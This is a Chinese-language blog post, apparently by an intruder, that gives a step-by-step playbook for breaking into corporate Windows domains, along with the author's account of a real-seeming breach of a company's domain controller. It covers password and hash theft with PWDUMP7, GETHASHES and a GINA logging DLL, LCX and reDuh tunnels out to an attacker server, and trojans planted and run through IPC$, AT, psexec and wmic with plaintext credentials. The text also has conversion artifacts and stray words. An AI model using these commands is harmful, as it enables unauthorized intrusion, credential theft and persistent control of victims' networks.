內網***經常使用命令

 1.收集信息。 html

  1-1.不管是什麼途徑得到的內網機器,肯定他在內網後,咱們首先就要了解這臺機器的所屬人員,若是咱們的目標是公司,那咱們就要了解這我的在公司裏的職位,他是個什麼身份,有多大的權利,這都關係到他在內網裏的權限。由於,做爲大公司,一個高權限的人他在內網裏所要用到的東西就多,那麼相對他的機器,固然權限就會比通常普通員工的高不少,這在個人***過程當中是常見的。java

  既然有了他的機器,那麼翻翻他的電腦這是必要的,若是你說要怎麼翻,你能夠嘗試熟悉他的電腦甚至比他本人還熟,那你就算了解詳細了。一臺我的用的電腦,從上面翻出與他本身相關的一些信息,和大量公司信息應該是沒有問題的,除非,這是臺新電腦。node

  1-2.瞭解了必定的人員信息,期間你要記下你所掌握到的帳號,密碼這些重要數據,之後有必定的用,因此,在你滲以前,不妨建個記事本將重要信息保存起來,寫個記事本不會浪費你多少時間。接下來,咱們就應該對這個網絡進行必定的瞭解,他是通常的內網,仍是域?通常大公司都會用域的,咱們只須要查一下就知道,要想對他進行***,你就必須瞭解他的網絡拓補,固然,一些太具體的物理上咱們是沒法瞭解的,咱們只能瞭解咱們所能知道的。無論他是INT,DMZ,LAN,咱們必須足夠掌握。在這,咱們就會用到必定的命令,相信你們應該都很熟悉。服務器

  ipconfig /all 查詢一下本機的一些狀況,IP段 網關 屬於不屬於域網絡

  net view 查詢一些存在聯繫的機器,通常以機器名顯示,咱們須要對其PING出IP,一是方便查詢哪些重要機器的IP,二是方便查詢存在幾個段dom

  net view /domain 查詢有幾個域 由於大型網絡裏面通常不止一個域的ide

  net group /domain 查詢域裏面的組工具

  net user /domain 查詢域用戶測試

  net group "domain admins" /domain 查詢域管理用戶組spa

  這些都是咱們須要瞭解的,固然有時候還會須要再查詢一些信息,NET命令下大家都會找到,不須要我再重複,具體的狀況具體分析問題。

  2.信息歸檔

  2-1。有了信息,咱們就要對信息進行必定的歸檔,將每一個機器名所對應的IP歸檔,方便用時不會亂。

  2-2。查詢出的用戶,管理員,咱們也必須歸檔。

  2-3。查詢信息時可能出現的有利用價值信息必須歸檔。

  3.技術利用

  3-1。不管是經過鍵盤記錄。或者HASH的抓取,咱們須要將帳號,密碼,郵箱,凡是涉及關鍵數據的所有保存,一方面是準備***的資料,二是防止當前利用機器會掉。

  3-1-1。利用遠控的鍵盤記錄進行抓取。

  3-1-2。利用PWDUMP7或者GETHASHES進行抓取HASH,而後破解。GETHASHES V1.4後 能夠抓取域的所有HASH。

  3-1-3。用GINASTUB.DLL獲取管理員的帳號和密碼。由於域管理員有權限登錄任何一臺機器。種上這個只是方便記錄他所登錄的密碼。INSTALL後,會在SYSYTEM32下生成一個 FAXMODE.INC 文件記錄密碼。

  3-2。有了內網,不少東西咱們是沒有必要直接在當前利用機器上操做的,別人雖然是內網,可是不表明他沒有防護系統,因此,咱們創建SOCKS或者×××是頗有必要的,創建SOCKS相信你們都會了吧。

  3-2-1。我在這推薦 VIDC 這個工具,很方便,在CMD下直接操 VIDC.EXE -D -P PORT 就能夠了。

  3-2-2。在利用機器上使用LCX,CMD下 LCX.EXE -SLAVE 服務器IP PORT 127.0.0.1 PORT,而後到服務器上 CMD下 LCX.EXE -LISTEN 服務器IP PORT 任意PORT。

  3-2-3。創建SOCKS後在本地能夠用SOCKSCAP來進行鏈接,成功鏈接後該操做什麼就看大家本身了。

  基本上咱們就只能操做這麼多了,後面已經沒有什麼技術上的再使用或利用,可是這中間的經驗很多,所須要處理的細節也很多。

  咱們在獲得內網機器後,若是他存在域,可是沒有使用域帳號怎麼辦?那咱們只能查詢或者想盡一切手段得到他經常使用的帳號密碼,而後利用這個帳號密碼,再經過SOCKS進入域。這其中就關係到各位同行查看控制機器的文件,還有記錄密碼,GINA,HASH破解,這些都是必須的。

  進入域後,咱們又該怎麼作,創建SOCKS後又該怎麼作。咱們能夠扔S上去查看主要的端口,咱們能夠對端口進行弱口令的嘗試,咱們能夠針對內網的WEB進行檢測,方式不少,甚至你能夠用MS08-067對另外一臺機器進行突破,可是相信我,能使用域的機器,大部分都是補丁打齊的。咱們能利用的不多,可是不能灰心,只要能在內網穿梭,咱們至少在防護上會輕鬆不少,咱們須要的只是耐心和時間。

  一旦擁有密碼,咱們就能夠嘗試IPC鏈接,直接拿下域,這就得看大家的權限有多大。

  net use \\IP\ipc$ password /user:username@domain

  推薦使用這樣的方式輸入帳號和密碼,爲何?若是用戶名存在空格,你這樣輸會保險些。什麼 域用戶不能存在空格?

  是的,之前我也認爲不會,微軟的講師也說不會,不過,通過個人測試和經驗,那是假的,域 徹底能夠空格,除了 user name 這樣的,還能夠存在 user na me ,不信 你能夠試試。

  創建IPC後,你只是想COPY文件 或者 RAR文件 再或者種馬 那就是你的自由了。

  後話:最近由於在滲域,在***過程當中,也確實出現一些問題,幾回都是不知如何進行,其實在技術上,並無什麼障礙。主要是在於對方有着比較強的主防護,而個人遠控最開始連CMD都沒法執行,後通過幾天的環境測試,突破了CMD。有了CMD後,進行了查詢,得到了一些信息,就開始了往下的***,被控機器的密碼我不是跑出來的,我是翻他的文件翻出他經常使用密碼的。由於他沒有使用域帳號,都是以系統帳號登錄,因此沒法查看域。我只能用他的域帳號創建IPC鏈接,查找到內網的一個WEB服務,將其***後纔算拿下了一個穩定的內網機器。

  拿下內網WEB服務器後,我就已經徹底在域內,沒有使用HASH INJECTION,我是先查詢了DOMAIN ADMINS,發現WEB服務器上的帳號就屬於這個組,PW後獲得了HASH,破解掉我就連向了域控服務器的IPC$。

  鏈接了IPC$,直接在其SYSYTEM32下扔了一個遠控,而後用AT命令將其啓動,這期間我嘗試了5個SHIFT,可是SHIFT關閉後,個人遠控也會掉,因此排除了這種方法,仍是用AT來ADD NEW JOB 比較方便。

  給域控服務器種了遠控,利用CMD來GETHASHES了所有的HASHES進行破解,很幸運的查到了文件管理組的用戶,這纔有了我後面的目標達成。

總的來講,我此次的***比較運氣好,中間麻煩事不是太多,不過也花了半個月的時間,時間大部分花在測試防護環境,軟件免殺,***免殺,查找資料這些上面。

  後來,我獲取了他的網絡拓補圖,發現我所呆的區域只是一個小小的域,還有好幾個域我尚未涉及到,在域的前面是DMZ,而DMZ前面固然是INT了。

  已經很晚了,原本是在寫一份詳細的***過程,不過由於一直工做,不少細節沒有辦法當場記錄,因此,暫時在BLOG上寫一些能想到的,後面若是有時間有環境,會再補充更多的細節以及圖片和在***時所遇到的麻煩,如何解決等寫出來。

  經常使用命令

  net view

  查看同一域/工做組的計算機列表

  net view /domain

  查看域/工做組列表

  net view /domain:Secwing

  查看Secwing域中 計算機列表

  net group /domain

  查看所在域的組

  net user /domain

  查看所在域用戶

  net user /domain zerosoul 12345678

  修改域用戶密碼,須要域管理員權限,或者Ctrl+Alt+Del點擊修改則不須要域管理員權限

  net localgroup administrators SECWING\zerosoul /add

  域Users組用戶添加到本地Administrators組,須要本地管理員或域管理員在本機登錄域後進行

  下面的命令 只能用於 域控制器:

  net group "Domain controllers"

  查看域控制器(若是有多臺)

  net group

  查看域的組

  net group "domain admins"

  查看域管理員

  net group "domain users"

  查看域管理員

  PS:打開配置域控制器嚮導的命令

  dcpromo

  psexec /accepteula 繞過第一次驗證窗口

  mstsc/admin 解決hash沒法抓出問題

  wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe

  psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷貝文件而且執行

  psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash

  net use \\172.16.16.2\IPC$ "k78m90" /user:"admintitrator"

  net use \\172.16.16.2\IPC$ "k78m90" /user:"aABIMAQ\Administrator"

  net time \\172.16.16.2

  at \\172.16.16.2 13:50 2009.exe

  java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh鏈接命令

  [createTunnel]1234:127.0.0.1:3389 端口轉向命令

  iam-alt -h user-hash 這樣hash就被注入

  whosthere-alt.exe 來查看是否被注入成功。

相關文章
相關標籤/搜索